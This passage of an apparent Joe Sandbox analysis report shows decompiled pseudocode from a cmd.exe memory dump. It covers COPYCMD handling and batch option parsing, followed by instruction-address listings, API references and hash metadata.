				E011E62FA(E011E3320(L"COPYCMD"), _t232);
				_v556 = 0;
				_t162 = E011DEA40( *((intOrPtr*)(__ecx + 0x3c)), 0, 0);
				if(E011E62FA(_t162, _t232) == 0) {
					L2:
					_t250 = _t162;
					_t217 = 0;
					_t12 =  &(_t250[1]); // 0x0
					_t169 = _t12;
					do {
						_t95 =  *_t250;
						_t250 =  &(_t250[1]);
					} while (_t95 != 0);
					_t251 = _t250 - _t169;
					_t252 = _t251 >> 1;
					if(_t251 == 0) {
						L46:
						_t170 = 0x232a;
						L48:
						L011F5CEA(_t162, _t170, _t217, __eflags);
						L49:
						_t170 = 0x232e;
						goto L48;
					}
					if(_t252 >= 0x7fe7) {
						goto L49;
					}
					_t233 = _t162;
					_t13 =  &(_t233[1]); // 0x0
					_t171 = _t13;
					do {
						_t97 =  *_t233;
						_t233 =  &(_t233[1]);
					} while (_t97 != 0);
					_t235 = _t233 - _t171 >> 1;
					_t98 = E011E22C0(_t162, _t162);
					_t14 = _t235 + 1; // -3
					_t217 = _t14;
					E011E1040(_t162, _t14, _t98);
					_t100 = E011E3B5D(_t162, _t14);
					 *_v560 = _t100;
					if(_t100 == 1) {
						_t170 =  *0x1213cf0;
						goto L48;
					}
					_v24 = 1;
					_v28 = 0;
					_v20 = 0x104;
					memset( &_v548, 0, 0x104);
					if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t170 = 0x2374;
						goto L48;
					}
					_t254 =  &(_t162[_t252 + 1]);
					if( *_t254 == 0) {
						_t177 = _v28;
						__eflags = _t177;
						if(_t177 == 0) {
							_t177 =  &_v548;
						}
						 *_t177 =  *((intOrPtr*)( *0x1213cec));
						_t112 = _v28;
						__eflags = _t112;
						if(_t112 == 0) {
							_t112 =  &_v548;
						}
						_t178 = 0x3a;
						 *((short*)(_t112 + 2)) = _t178;
						_t113 = _v28;
						__eflags = _t113;
						if(_t113 == 0) {
							_t113 =  &_v548;
						}
						 *((short*)(_t113 + 4)) = 0;
						L19:
						_t238 = _a8;
						_t217 = _a8;
						_t255 = _v552;
						if(E011E2D22(_v552, _t238, _t162) != 0) {
							goto L49;
						}
						_t163 = _v560;
						if(( *( *( *_t163 + 0x18)) & 0x00000010) == 0) {
							_t222 = 0x5c;
							_t258 = E011E2349(_t255, _t222);
							if(_t258 == 0) {
								_t259 = _v552;
							} else {
								_t259 = _t258 + 2;
							}
							_t223 = 0x5c;
							if(E011E2349( *((intOrPtr*)( *_t163 + 0x10)), _t223) == 0) {
								_t139 =  *((intOrPtr*)( *_t163 + 0x10));
							}
							E011E1040(_t259, _t238 - (_t259 - _v552 >> 1), _t139);
						}
						_t117 = _v28;
						if(_v28 == 0) {
							_t117 =  &_v548;
						}
						_t162 = _v564;
						_t217 = _a16;
						_t118 = E011E2D22(_t162, _a16, _t117);
						if(_t118 != 0) {
							goto L49;
						} else {
							_t256 = _t118;
							 *0x1213cf0 = _t118;
							SetLastError(_t118);
							_t239 = _v568;
							_t182 = _t162;
							 *_t239 = 0;
							_t120 =  *_t162 & 0x0000ffff;
							_t217 = _t120;
							if(_t120 == 0) {
								L32:
								_t121 = 0x5c;
								if(_t217 == _t121) {
									_t183 = _t162;
									_t256 = 1;
									__eflags = 1;
									_t217 =  &(_t183[1]);
									do {
										_t122 =  *_t183;
										_t183 =  &(_t183[1]);
										__eflags = _t122 - _v556;
									} while (_t122 != _v556);
									 *((short*)(_t162 + (_t183 - _t217 >> 1) * 2 - 2)) = 0;
								}
								_t124 = GetFileAttributesW(_t162);
								if(_t124 != 0xffffffff) {
									__eflags = _t124 & 0x00000010;
									if((_t124 & 0x00000010) != 0) {
										 *_t239 = 1;
										_t256 = 1;
									}
									L36:
									if(_t256 != 0) {
										_t125 = 0x5c;
										_t126 = E011E2349(_v552, _t125);
										_t256 = _t126;
										__eflags = 0;
										_t219 = _t126;
										_t49 = _t219 + 2; // 0x2
										_t127 = _t49;
										do {
											_t187 =  *_t219;
											_t219 = _t219 + 2;
											__eflags = _t187;
										} while (_t187 != 0);
										_t188 = _t162;
										_t220 = _t219 - _t127;
										__eflags = _t220;
										_t217 = _t220 >> 1;
										_t241 =  &(_t188[1]);
										do {
											_t128 =  *_t188;
											_t188 =  &(_t188[1]);
											__eflags = _t128 - _v556;
										} while (_t128 != _v556);
										_t52 = _t217 + 1; // -1
										__eflags = _t52 + (_t188 - _t241 >> 1) - 0x7fe7;
										if(__eflags > 0) {
											goto L49;
										}
										_t217 = _a16;
										E011E18C0(_t162, _a16, _t256);
									}
									__imp__??_V@YAXPAX@Z(_v28);
									_pop(_t242);
									return E011E6FD0(0, _t162, _v8 ^ _t260, _t217, _t242, _t256);
								}
								_t136 = GetLastError();
								 *0x1213cf0 = _t136;
								if(_t136 == 0 || _t136 == 2) {
									goto L36;
								} else {
									__eflags = _t136 - 3;
									if(__eflags == 0) {
										goto L36;
									}
									_t170 = _t136;
									goto L48;
								}
							}
							do {
								_t137 = _t182;
								_t182 =  &(_t182[1]);
							} while ( *_t182 != 0);
							_t217 =  *_t137 & 0x0000ffff;
							goto L32;
						}
					}
					_t199 = _t254;
					if( *((intOrPtr*)(E011DD7E6(_t199))) != 0) {
						goto L46;
					}
					_t217 =  &(_t199[1]);
					do {
						_t146 =  *_t199;
						_t199 =  &(_t199[1]);
					} while (_t146 != 0);
					if(_t199 - _t217 >> 1 > 0x7fe7) {
						goto L49;
					}
					_t244 = _t254;
					_t27 =  &(_t244[1]); // -1
					_t202 = _t27;
					do {
						_t147 =  *_t244;
						_t244 =  &(_t244[1]);
					} while (_t147 != 0);
					_t246 = _t244 - _t202 >> 1;
					_t148 = E011E22C0(_t162, _t254);
					_t28 = _t246 + 1; // -4
					E011E1040(_t254, _t28, _t148);
					_t150 = _t254[1] & 0x0000ffff;
					_t227 = 0x3a;
					if(_t150 != _t227) {
						_t205 = 0x5c;
						__eflags =  *_t254 - _t205;
						if( *_t254 != _t205) {
							L61:
							_t206 = _v28;
							__eflags = _t206;
							if(_t206 == 0) {
								_t206 =  &_v548;
							}
							 *_t206 =  *((intOrPtr*)( *0x1213cec));
							_t153 = _v28;
							__eflags = _t153;
							if(_t153 == 0) {
								_t153 =  &_v548;
							}
							 *((short*)(_t153 + 2)) = _t227;
							_t154 = _v28;
							__eflags = _t154;
							if(_t154 == 0) {
								_t154 =  &_v548;
							}
							 *((short*)(_t154 + 4)) = 0;
							_t208 = _v28;
							__eflags = _t208;
							if(_t208 == 0) {
								_t208 =  &_v548;
							}
							_t228 = _t208 + 2;
							__eflags = 0;
							do {
								_t155 =  *_t208;
								_t208 = _t208 + 2;
								__eflags = _t155;
							} while (_t155 != 0);
							_t209 = _t208 - _t228;
							__eflags = _t209;
							_t229 = _t254;
							_t210 = _t209 >> 1;
							_t73 =  &(_t229[1]); // 0x1
							_t248 = _t73;
							do {
								_t156 =  *_t229;
								_t229 =  &(_t229[1]);
								__eflags = _t156 - _v556;
							} while (_t156 != _v556);
							_t217 = _t229 - _t248 >> 1;
							__eflags = _t210 + 1 + (_t229 - _t248 >> 1) - 0x7fe7;
							if(__eflags > 0) {
								goto L49;
							}
							E011E0CF2(_t217, _t254);
							goto L19;
						}
						__eflags = _t150 - _t205;
						if(_t150 == _t205) {
							goto L18;
						}
						goto L61;
					}
					L18:
					E011E0D89(_t227, _t254);
					goto L19;
				} else {
					goto L1;
				}
				do {
					L1:
					_t161 =  *_t162 & 0x0000ffff;
					_t162 =  &(_t162[1]);
				} while (_t161 != 0);
				goto L2;
			}




















































































                                    0x011e5fd3
                                    0x011e5fda
                                    0x011e5fe0
                                    0x011e5fea
                                    0x011e5ff6
                                    0x011e6005
                                    0x011e6007
                                    0x011e6016
                                    0x011e6023
                                    0x011e602e
                                    0x011e603b
                                    0x011e6048
                                    0x011e6048
                                    0x011e604a
                                    0x011e604c
                                    0x011e604c
                                    0x011e604f
                                    0x011e604f
                                    0x011e6052
                                    0x011e6055
                                    0x011e605a
                                    0x011e605c
                                    0x011e605e
                                    0x011ef576
                                    0x011ef576
                                    0x011ef57f
                                    0x011ef57f
                                    0x011ef584
                                    0x011ef584
                                    0x00000000
                                    0x011ef584
                                    0x011e606a
                                    0x00000000
                                    0x00000000
                                    0x011e6070
                                    0x011e6072
                                    0x011e6072
                                    0x011e6075
                                    0x011e6075
                                    0x011e6078
                                    0x011e607b
                                    0x011e6084
                                    0x011e6086
                                    0x011e608c
                                    0x011e608c
                                    0x011e6091
                                    0x011e6098
                                    0x011e60a3
                                    0x011e60a8
                                    0x011ef58b
                                    0x00000000
                                    0x011ef58b
                                    0x011e60b0
                                    0x011e60b9
                                    0x011e60c4
                                    0x011e60c8
                                    0x011e60ee
                                    0x011ef593
                                    0x00000000
                                    0x011ef593
                                    0x011e60f7
                                    0x011e60fd
                                    0x011ef59a
                                    0x011ef59d
                                    0x011ef59f
                                    0x011ef5a1
                                    0x011ef5a1
                                    0x011ef5af
                                    0x011ef5b2
                                    0x011ef5b5
                                    0x011ef5b7
                                    0x011ef5b9
                                    0x011ef5b9
                                    0x011ef5c1
                                    0x011ef5c2
                                    0x011ef5c6
                                    0x011ef5c9
                                    0x011ef5cb
                                    0x011ef5cd
                                    0x011ef5cd
                                    0x011ef5d5
                                    0x011e6175
                                    0x011e6175
                                    0x011e6178
                                    0x011e617a
                                    0x011e618a
                                    0x00000000
                                    0x00000000
                                    0x011e6190
                                    0x011e619e
                                    0x011e61a2
                                    0x011e61aa
                                    0x011e61ae
                                    0x011ef685
                                    0x011e61b4
                                    0x011e61b4
                                    0x011e61b4
                                    0x011e61bb
                                    0x011e61c6
                                    0x011e61ca
                                    0x011e61ca
                                    0x011e61de
                                    0x011e61de
                                    0x011e61e3
                                    0x011e61e8
                                    0x011ef690
                                    0x011ef690
                                    0x011e61ee
                                    0x011e61f6
                                    0x011e61fa
                                    0x011e6201
                                    0x00000000
                                    0x011e6207
                                    0x011e6208
                                    0x011e620a
                                    0x011e620f
                                    0x011e6215
                                    0x011e621d
                                    0x011e621f
                                    0x011e6221
                                    0x011e6224
                                    0x011e6229
                                    0x011e623a
                                    0x011e623c
                                    0x011e6240
                                    0x011ef69b
                                    0x011ef69f
                                    0x011ef69f
                                    0x011ef6a0
                                    0x011ef6a3
                                    0x011ef6a3
                                    0x011ef6a6
                                    0x011ef6a9
                                    0x011ef6a9
                                    0x011ef6b8
                                    0x011ef6b8
                                    0x011e6247
                                    0x011e6250
                                    0x011e628d
                                    0x011e628f
                                    0x011e6294
                                    0x011e6296
                                    0x011e6296
                                    0x011e626a
                                    0x011e626c
                                    0x011e62a2
                                    0x011e62a5
                                    0x011e62aa
                                    0x011e62ac
                                    0x011e62ae
                                    0x011e62b0
                                    0x011e62b0
                                    0x011e62b3
                                    0x011e62b3
                                    0x011e62b6
                                    0x011e62b9
                                    0x011e62b9
                                    0x011e62be
                                    0x011e62c0
                                    0x011e62c0
                                    0x011e62c2
                                    0x011e62c4
                                    0x011e62c7
                                    0x011e62c7
                                    0x011e62ca
                                    0x011e62cd
                                    0x011e62cd
                                    0x011e62d8
                                    0x011e62df
                                    0x011e62e4
                                    0x00000000
                                    0x00000000
                                    0x011e62ea
                                    0x011e62f0
                                    0x011e62f0
                                    0x011e6271
                                    0x011e627d
                                    0x011e628a
                                    0x011e628a
                                    0x011e6252
                                    0x011e6258
                                    0x011e625f
                                    0x00000000
                                    0x011ef6c2
                                    0x011ef6c2
                                    0x011ef6c5
                                    0x00000000
                                    0x00000000
                                    0x011ef57d
                                    0x00000000
                                    0x011ef57d
                                    0x011e625f
                                    0x011e622d
                                    0x011e622d
                                    0x011e622f
                                    0x011e6232
                                    0x011e6237
                                    0x00000000
                                    0x011e6237
                                    0x011e6201
                                    0x011e6103
                                    0x011e610d
                                    0x00000000
                                    0x00000000
                                    0x011e6113
                                    0x011e6116
                                    0x011e6116
                                    0x011e6119
                                    0x011e611c
                                    0x011e612b
                                    0x00000000
                                    0x00000000
                                    0x011e6131
                                    0x011e6135
                                    0x011e6135
                                    0x011e6138
                                    0x011e6138
                                    0x011e613b
                                    0x011e613e
                                    0x011e6147
                                    0x011e6149
                                    0x011e614f
                                    0x011e6154
                                    0x011e6159
                                    0x011e615f
                                    0x011e6163
                                    0x011ef5e0
                                    0x011ef5e1
                                    0x011ef5e4
                                    0x011ef5ef
                                    0x011ef5ef
                                    0x011ef5f2
                                    0x011ef5f4
                                    0x011ef5f6
                                    0x011ef5f6
                                    0x011ef604
                                    0x011ef607
                                    0x011ef60a
                                    0x011ef60c
                                    0x011ef60e
                                    0x011ef60e
                                    0x011ef614
                                    0x011ef618
                                    0x011ef61b
                                    0x011ef61d
                                    0x011ef61f
                                    0x011ef61f
                                    0x011ef627
                                    0x011ef62b
                                    0x011ef62e
                                    0x011ef630
                                    0x011ef632
                                    0x011ef632
                                    0x011ef638
                                    0x011ef63b
                                    0x011ef63d
                                    0x011ef63d
                                    0x011ef640
                                    0x011ef643
                                    0x011ef643
                                    0x011ef648
                                    0x011ef648
                                    0x011ef64a
                                    0x011ef64c
                                    0x011ef64e
                                    0x011ef64e
                                    0x011ef651
                                    0x011ef651
                                    0x011ef654
                                    0x011ef657
                                    0x011ef657
                                    0x011ef665
                                    0x011ef669
                                    0x011ef66e
                                    0x00000000
                                    0x00000000
                                    0x011ef67b
                                    0x00000000
                                    0x011ef67b
                                    0x011ef5e6
                                    0x011ef5e9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ef5e9
                                    0x011e6169
                                    0x011e6170
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e603d
                                    0x011e603d
                                    0x011e603d
                                    0x011e6040
                                    0x011e6043
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011E6367
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011EF6F6
                                    • memset.MSVCRT ref: 011E60C8
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 011E620F
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E6247
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E6252
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                    • String ID: COPYCMD
                                    • API String ID: 1068965577-3727491224
                                    • Opcode ID: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                    • Instruction ID: 483a9fdbe8bd90f742b05a9b1b168e19983e5bc8bc7b47db92ee463cf8520405
                                    • Opcode Fuzzy Hash: 74bda750c58123a4ff90193598c03149eaec80dfcd030348955cd581489125b5
                                    • Instruction Fuzzy Hash: 9BD1E635A009178BCB2DDFA8D8986BAB7F5EFA8304F454569DC06D7295EB30DE42CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5E70, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E011D5E70(void* __ecx, signed int* _a4) {
				signed int _v8;
				short _v24;
				short _v26;
				short _v28;
				signed short _v29;
				signed int _v36;
				signed int _v40;
				signed short* _v44;
				intOrPtr _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				signed int _t100;
				intOrPtr _t104;
				signed int _t107;
				short* _t117;
				signed int _t118;
				signed short* _t120;
				signed short _t122;
				signed int _t124;
				signed int _t129;
				signed int _t132;
				signed short _t133;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				short _t148;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t162;
				void* _t163;
				signed short _t165;
				signed short _t170;
				void* _t173;
				signed int _t174;
				signed int _t177;
				intOrPtr _t178;
				void* _t189;
				signed short* _t200;
				signed int _t204;
				void* _t205;
				void* _t206;
				signed int* _t212;
				void* _t213;
				void* _t214;
				signed int _t216;
				wchar_t* _t219;
				int _t220;
				void* _t221;
				signed int _t223;
				signed int* _t225;
				signed int _t230;
				signed int _t234;

				_t230 = _t234;
				_push(__ecx);
				_push(__ecx);
				_t212 = _a4;
				_t162 = 0;
				_t219 = _t212[0xf];
				if(_t219 == 0) {
					L15:
					if( *_t212 != 0x14) {
						goto L65;
					} else {
						goto L16;
					}
				} else {
					_t205 = 0x20;
					while(1) {
						_t80 =  *_t219 & 0x0000ffff;
						if(_t80 == 0 || _t80 > _t205) {
							break;
						}
						_t219 =  &(_t219[0]);
						__eflags = _t219;
						if(_t219 != 0) {
							continue;
						} else {
						}
						break;
					}
					if(_t219 == 0) {
						goto L15;
					} else {
						__imp___wcsnicmp(_t219, L"/B", 2);
						_t234 = _t234 + 0xc;
						if(_t80 != 0) {
							L11:
							if(_t219 != 0) {
								_t80 = swscanf(_t219, L"%d",  &_v8);
								_t234 = _t234 + 0xc;
								if(_t80 == 1) {
									_t80 = _v8;
									 *0x120b8b0 = _t80;
									if( *0x1213ccc != _t162) {
										_t162 = _t80;
									}
								}
							}
							goto L15;
						} else {
							 *_t212 = 0x14;
							_t212[0xf] = L":EOF";
							_t219 =  &(_t219[1]);
							if(_t219 == 0) {
								L16:
								if( *0x1213cc4 == 0) {
									L65:
									_t170 =  *0x1203874;
									E011DC7F7(_t80, _t170);
									_t220 =  *0x120b8b0;
									do {
										__eflags = E011E4B60(__eflags, 0);
									} while (__eflags == 0);
									exit(_t220);
									asm("int3");
									_t83 =  *(_t162 + 0xc);
									__eflags = _t83;
									if(_t83 != 0) {
										do {
											_t216 = _t83;
											_v40 = _t216;
											_t83 =  *(_t216 + 0xc);
											__eflags = _t83;
										} while (_t83 != 0);
										_t212 = _v36;
										_t162 = _v40;
									}
									_t84 =  *_t220 & 0x0000ffff;
									__eflags = _t84;
									if(_t84 == 0) {
										L38:
										_t85 = 0;
										__eflags = 0;
										goto L39;
									} else {
										while(1) {
											_t207 = 0x2f;
											_v29 = _t170;
											__eflags = _t84 - _t207;
											if(_t84 != _t207) {
												goto L36;
											}
											_t7 = _t220 + 4; // 0x4
											_t117 = _t7;
											_t165 = _t170;
											__eflags =  *_t117 - 0x2d;
											_v52 = _t117;
											if( *_t117 == 0x2d) {
												_v29 = 1;
												_t165 = 1;
											}
											_t118 = _t165 & 0x0000ffff;
											_v36 = _t118;
											_t120 = _t220 + (_t118 + 2) * 2;
											_v44 = _t120;
											_t122 = towupper( *_t120 & 0x0000ffff);
											_pop(_t196);
											_t124 = (_t122 & 0x0000ffff) - 0x3f;
											__eflags = _t124;
											if(__eflags == 0) {
												E011F9373(_t207, __eflags);
												__eflags = 0;
												_push(0);
												_push(0x2381);
												E011DC108(_t196);
												 *0x1218065 = 0;
												 *0x121851c = 0;
												goto L93;
											} else {
												_t129 = _t124;
												__eflags = _t129;
												if(_t129 == 0) {
													__eflags = _v29;
													if(_v29 == 0) {
														_t207 = _t212;
														_t132 = E011F9CFA(_t220 + (_v36 + 3) * 2, _t212);
														__eflags = _t132;
														if(_t132 != 0) {
															goto L93;
														} else {
															__eflags = _t212[2] & 0x00000001;
															if((_t212[2] & 0x00000001) != 0) {
																 *_t212 =  *_t212 | 0x00001000;
															}
															goto L33;
														}
													} else {
														_t200 = _v44;
														_t207 =  &(_t200[1]);
														do {
															_t133 =  *_t200;
															_t200 =  &(_t200[1]);
															__eflags = _t133 - _v48;
														} while (_t133 != _v48);
														_t196 = _t200 - _t207 >> 1;
														__eflags = _t200 - _t207 >> 1 - 1;
														if(_t200 - _t207 >> 1 > 1) {
															goto L89;
														} else {
															_t212[1] = 6;
															_t212[2] = 0;
															goto L33;
														}
													}
												} else {
													_t139 = _t129 - 5;
													__eflags = _t139;
													if(_t139 == 0) {
														__eflags = _v29;
														_t140 =  *_t212;
														if(_v29 != 0) {
															_t141 = _t140 ^ 0x00001000;
														} else {
															_t141 = _t140 | 0x00001000;
															__eflags = _t141;
														}
														goto L32;
													} else {
														_t143 = _t139 - 0xa;
														__eflags = _t143;
														if(_t143 == 0) {
															__eflags = _v29;
															_t144 =  *_t212;
															if(_v29 == 0) {
																_t141 = _t144 | 0x00000800;
															} else {
																_t141 = _t144 ^ 0x00000800;
															}
															goto L32;
														} else {
															_t145 = _t143 - 1;
															__eflags = _t145;
															if(_t145 != 0) {
																__eflags = _t145 != 0;
																if(_t145 != 0) {
																	_t148 = 0x2f;
																	_v28 = _t148;
																	_v26 =  *((intOrPtr*)(_t220 + 4));
																	_v24 = 0;
																	_push(_t220 + ((_t165 & 0x0000ffff) + 2) * 2);
																	_push(1);
																	_push(0x2375);
																	goto L91;
																} else {
																	__eflags = _v29;
																	_t154 =  *_t212;
																	if(_v29 != 0) {
																		_t155 = _t154 ^ 0x00000010;
																	} else {
																		_t155 = _t154 | 0x00000010;
																		__eflags = _t155;
																	}
																	 *_t212 = _t155;
																	_t156 = _v36;
																	__eflags =  *(_t220 + 6 + _t156 * 2);
																	if( *(_t220 + 6 + _t156 * 2) == 0) {
																		goto L33;
																	} else {
																		_t204 = (_t165 & 0x0000ffff) + 2;
																		_t196 = _t220 + _t204 * 2;
																		_push(_t220 + _t204 * 2);
																		goto L90;
																	}
																}
															} else {
																__eflags = _v29;
																_t157 =  *_t212;
																if(_v29 != 0) {
																	_t141 = _t157 ^ 0x00002000;
																} else {
																	_t141 = _t157 | 0x00002000;
																}
																L32:
																 *_t212 = _t141;
																_t196 = 0;
																_t142 = _v36;
																__eflags =  *(_t220 + 6 + _t142 * 2);
																if( *(_t220 + 6 + _t142 * 2) != 0) {
																	L89:
																	_t135 = (_t165 & 0x0000ffff) + 2;
																	__eflags = _t135;
																	_push(_t220 + _t135 * 2);
																	L90:
																	_push(1);
																	_push(0x2376);
																	L91:
																	E011DC5A2(_t196);
																	L93:
																	_t85 = 1;
																	L39:
																	_pop(_t213);
																	_pop(_t221);
																	__eflags = _v8 ^ _t230;
																	_pop(_t163);
																	return E011E6FD0(_t85, _t163, _v8 ^ _t230, _t207, _t213, _t221);
																} else {
																	L33:
																	_t220 = _v52;
																	_t162 = _v40;
																	L34:
																	_t220 = E011DD7E6(_t220);
																	_t84 =  *_t220 & 0x0000ffff;
																	__eflags = _t84;
																	if(_t84 == 0) {
																		goto L38;
																	} else {
																		_t170 = 0;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
											goto L102;
											L36:
											_t87 = _t212[0x12];
											__eflags = _t87;
											if(_t87 != 0) {
												_t173 = 0x10;
												_t88 = E011E00B0(_t173);
												__eflags = _t88;
												if(_t88 == 0) {
													E011F9287(_t173);
													__imp__longjmp(0x120b8b8, 1);
													asm("int3");
													_t174 = 0x1213ab0;
													__eflags = 0;
													do {
														_t90 =  *_t174;
														_t174 = _t174 + 2;
														__eflags = _t90;
													} while (_t90 != 0);
													_t214 = (_t174 - 0x1213ab2 >> 1) + 1;
													_t223 = HeapAlloc(GetProcessHeap(), 8, 0xc);
													__eflags = _t223;
													if(_t223 == 0) {
														L96:
														_t94 = 1;
													} else {
														_t177 = HeapAlloc(GetProcessHeap(), 8, _t214 + _t214);
														 *_t223 = _t177;
														__eflags = _t177;
														if(_t177 == 0) {
															goto L96;
														} else {
															_t98 =  *0x1213cb8;
															__eflags = _t98;
															if(_t98 == 0) {
																_t98 = 0x1213ab0;
															}
															E011E1040(_t177, _t214, _t98);
															_t100 = E011E3B2C(_t177);
															 *(_t223 + 4) = _t100;
															__eflags = _t100;
															if(_t100 == 0) {
																goto L96;
															} else {
																_t178 =  *0x1213cc4;
																 *((char*)(_t223 + 8)) =  *0x1213cc9;
																 *((char*)(_t223 + 9)) =  *0x1213cc8;
																 *(_t178 + 0x90 +  *(_t178 + 0x14) * 4) = _t223;
																_t104 =  *0x1213cd8;
																 *(_t178 + 0x14) =  *(_t178 + 0x14) + 1;
																 *((intOrPtr*)(_t178 + 0xc)) = _t104;
																__eflags =  *((intOrPtr*)(_t178 + 0x10)) - _t104;
																if( *((intOrPtr*)(_t178 + 0x10)) < _t104) {
																	 *((intOrPtr*)(_t178 + 0x10)) = _t104;
																}
																_t225 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x3c)), 0, 0);
																_t107 = 0;
																 *0x120b8b0 = 0;
																while(1) {
																	__eflags =  *_t225 - _t107;
																	if( *_t225 == _t107) {
																		break;
																	}
																	__imp___wcsicmp(_t225, L"ENABLEEXTENSIONS");
																	__eflags = _t107;
																	if(_t107 != 0) {
																		__imp___wcsicmp(_t225, L"DISABLEEXTENSIONS");
																		__eflags = _t107;
																		if(_t107 == 0) {
																			 *0x1213cc9 = 0;
																			goto L58;
																		} else {
																			__imp___wcsicmp(_t225, L"ENABLEDELAYEDEXPANSION");
																			__eflags = _t107;
																			if(_t107 != 0) {
																				__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
																				_t189 = _t225;
																				__eflags = _t107;
																				if(_t107 != 0) {
																					__eflags =  *_t225;
																					if( *_t225 == 0) {
																						goto L58;
																					} else {
																						_push(0);
																						_push(0x400023a6);
																						E011DC5A2(_t189);
																						_t94 = 1;
																						 *0x120b8b0 = 1;
																					}
																				} else {
																					 *0x1213cc8 = _t107;
																					goto L58;
																				}
																			} else {
																				 *0x1213cc8 = 1;
																				goto L58;
																			}
																		}
																	} else {
																		 *0x1213cc9 = 1;
																		L58:
																		_t225 = E011DD7E6(_t225);
																		_t107 = 0;
																		__eflags = 0;
																		continue;
																	}
																	goto L63;
																}
																_t94 = 0;
																__eflags = 0;
															}
														}
													}
													L63:
													return _t94;
												} else {
													 *(_t162 + 0xc) = _t88;
													_t162 = _t88;
													 *((intOrPtr*)(_t88 + 0xc)) = 0;
													_t87 = _t212[0x12];
													_v40 = _t162;
													goto L37;
												}
											} else {
												L37:
												_t212[0x12] = _t87 + 1;
												 *_t162 = E011E297B(E011E22C0(_t162, _t220));
												 *((char*)(_t162 + 8)) = 1;
												goto L34;
											}
											goto L102;
										}
									}
								} else {
									E011D6980(_t212);
									return _t162;
								}
							} else {
								_t206 = 0x20;
								while(1) {
									_t80 =  *_t219 & 0x0000ffff;
									if(_t80 == 0 || _t80 > _t206) {
										goto L11;
									}
									_t219 =  &(_t219[0]);
									if(_t219 != 0) {
										continue;
									}
									goto L11;
								}
								goto L11;
							}
						}
					}
				}
				L102:
			}









































































                                    0x011d5e73
                                    0x011d5e75
                                    0x011d5e76
                                    0x011d5e7a
                                    0x011d5e7d
                                    0x011d5e7f
                                    0x011d5e84
                                    0x011d5f0d
                                    0x011d5f10
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d5e8a
                                    0x011d5e8c
                                    0x011d5e8d
                                    0x011d5e8d
                                    0x011d5e93
                                    0x00000000
                                    0x00000000
                                    0x011d5f35
                                    0x011d5f35
                                    0x011d5f38
                                    0x00000000
                                    0x00000000
                                    0x011d5f3e
                                    0x00000000
                                    0x011d5f38
                                    0x011d5ea0
                                    0x00000000
                                    0x011d5ea2
                                    0x011d5eaa
                                    0x011d5eb0
                                    0x011d5eb5
                                    0x011d5edf
                                    0x011d5ee1
                                    0x011d5eed
                                    0x011d5ef3
                                    0x011d5ef9
                                    0x011d5efb
                                    0x011d5efe
                                    0x011d5f09
                                    0x011d5f0b
                                    0x011d5f0b
                                    0x011d5f09
                                    0x011d5ef9
                                    0x00000000
                                    0x011d5eb7
                                    0x011d5eb7
                                    0x011d5ebd
                                    0x011d5ec4
                                    0x011d5ec7
                                    0x011d5f16
                                    0x011d5f1d
                                    0x011ea76e
                                    0x011ea76e
                                    0x011ea774
                                    0x011ea779
                                    0x011ea77f
                                    0x011ea786
                                    0x011ea786
                                    0x011ea78b
                                    0x011ea791
                                    0x011ea792
                                    0x011ea795
                                    0x011ea797
                                    0x011ea79d
                                    0x011ea79d
                                    0x011ea79f
                                    0x011ea7a2
                                    0x011ea7a5
                                    0x011ea7a5
                                    0x011ea7a9
                                    0x011ea7ac
                                    0x011ea7ac
                                    0x011dc2db
                                    0x011dc2de
                                    0x011dc2e1
                                    0x011dc3c8
                                    0x011dc3c8
                                    0x011dc3c8
                                    0x00000000
                                    0x00000000
                                    0x011dc2e7
                                    0x011dc2e9
                                    0x011dc2ea
                                    0x011dc2ed
                                    0x011dc2f0
                                    0x00000000
                                    0x00000000
                                    0x011dc2f6
                                    0x011dc2f6
                                    0x011dc2f9
                                    0x011dc2fb
                                    0x011dc2ff
                                    0x011dc302
                                    0x011ea7b6
                                    0x011ea7ba
                                    0x011ea7ba
                                    0x011dc308
